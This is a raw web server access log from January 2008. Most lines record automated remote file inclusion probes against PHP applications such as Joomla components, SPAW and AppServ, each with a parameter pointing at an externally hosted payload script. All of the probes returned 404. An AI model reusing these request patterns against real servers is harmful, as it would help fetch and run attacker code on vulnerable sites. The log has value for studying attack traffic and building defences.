207.58.184.150 - - [30/Jan/2008:14:53:30 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.233 - - [30/Jan/2008:14:54:02 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.91.66.79 - - [30/Jan/2008:14:54:25 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.91.66.79 - - [30/Jan/2008:14:54:26 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:14:54:38 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.240.31.1 - - [30/Jan/2008:14:54:42 -0800] "GET /logs/access_071230.log//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.32.128.178 - - [30/Jan/2008:14:55:02 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.133.27 - - [30/Jan/2008:14:55:12 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [30/Jan/2008:14:55:13 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:14:56:52 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:14:56:54 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:14:57:53 -0800] "GET /logs/access_071229.log/components/com_simpleboard/file_upload.php?sbp=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:14:57:59 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:14:58:04 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.133.36 - - [30/Jan/2008:14:59:45 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.133.36 - - [30/Jan/2008:14:59:45 -0800] "GET //appserv/main.php?appserv_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.133.36 - - [30/Jan/2008:14:59:45 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [30/Jan/2008:15:00:53 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [30/Jan/2008:15:00:53 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.72 - - [30/Jan/2008:15:01:06 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.120.242 - - [30/Jan/2008:15:01:35 -0800] "GET //PPS.php?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.118.120.242 - - [30/Jan/2008:15:01:35 -0800] "GET /logs//PPS.php?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
72.22.74.129 - - [30/Jan/2008:15:01:41 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.22.74.129 - - [30/Jan/2008:15:01:41 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.26 - - [30/Jan/2008:15:01:49 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.26 - - [30/Jan/2008:15:01:49 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.133.36 - - [30/Jan/2008:15:01:57 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.157.174.120 - - [30/Jan/2008:15:02:15 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.157.174.120 - - [30/Jan/2008:15:02:16 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.224.200 - - [30/Jan/2008:15:02:17 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.224.200 - - [30/Jan/2008:15:02:28 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.224.200 - - [30/Jan/2008:15:02:39 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.224.200 - - [30/Jan/2008:15:02:39 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.237.123.245 - - [30/Jan/2008:15:03:12 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.237.123.245 - - [30/Jan/2008:15:03:12 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:15:04:34 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:15:04:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:15:04:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:15:05:23 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:15:05:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:15:05:24 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:15:05:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:15:05:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:15:05:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.53.225.40 - - [30/Jan/2008:15:06:18 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.189.27.130 - - [30/Jan/2008:15:06:24 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.27.130 - - [30/Jan/2008:15:06:24 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:15:08:09 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:15:08:09 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:15:08:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:09:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:09:44 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:09:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:09:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:09:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:09:44 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
66.79.163.220 - - [30/Jan/2008:15:10:01 -0800] "GET /logs/access_071225.log//index.php?body=http://www.fallas.es/components/d.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [30/Jan/2008:15:10:01 -0800] "GET //index.php?body=http://www.fallas.es/components/d.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [30/Jan/2008:15:10:01 -0800] "GET /logs//index.php?body=http://www.fallas.es/components/d.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [30/Jan/2008:15:10:02 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [30/Jan/2008:15:10:02 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:15:10:06 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:15:10:06 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:15:10:06 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:15:10:07 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:15:10:48 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.204.31 - - [30/Jan/2008:15:10:58 -0800] "GET /logs/access_080106.log/index.php?option=com_alphacontent=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [30/Jan/2008:15:10:58 -0800] "GET /logs/index.php?option=com_alphacontent=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.120.242 - - [30/Jan/2008:15:12:03 -0800] "GET /File.php?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.118.120.242 - - [30/Jan/2008:15:12:03 -0800] "GET /logs/File.php?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.79.163.220 - - [30/Jan/2008:15:12:57 -0800] "GET /logs/access_080110.log//index.php?body=http://www.fallas.es/components/d.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.243.180 - - [30/Jan/2008:15:13:36 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [30/Jan/2008:15:14:18 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [30/Jan/2008:15:14:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [30/Jan/2008:15:14:19 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [30/Jan/2008:15:14:25 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.130.26 - - [30/Jan/2008:15:15:48 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.18.130.26 - - [30/Jan/2008:15:15:49 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:16:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:16:12 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:16:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:16:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:16:12 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.78.44 - - [30/Jan/2008:15:16:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
202.190.73.172 - - [30/Jan/2008:15:20:28 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/bda.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.190.73.172 - - [30/Jan/2008:15:20:28 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/bda.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.190.73.172 - - [30/Jan/2008:15:20:28 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.190.73.172 - - [30/Jan/2008:15:20:29 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.200.33 - - [30/Jan/2008:15:20:59 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/e.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.7.200.33 - - [30/Jan/2008:15:21:03 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/e.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.7.200.33 - - [30/Jan/2008:15:21:10 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/e.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.7.200.33 - - [30/Jan/2008:15:21:10 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/e.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:15:21:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:15:21:26 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:15:21:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:15:21:26 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:15:21:47 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:15:21:48 -0800] "GET //skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:15:21:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:15:22:53 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:15:23:41 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.120.242 - - [30/Jan/2008:15:24:00 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
87.118.120.242 - - [30/Jan/2008:15:24:00 -0800] "GET /Writer.php?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.25.151.98 - - [30/Jan/2008:15:24:24 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
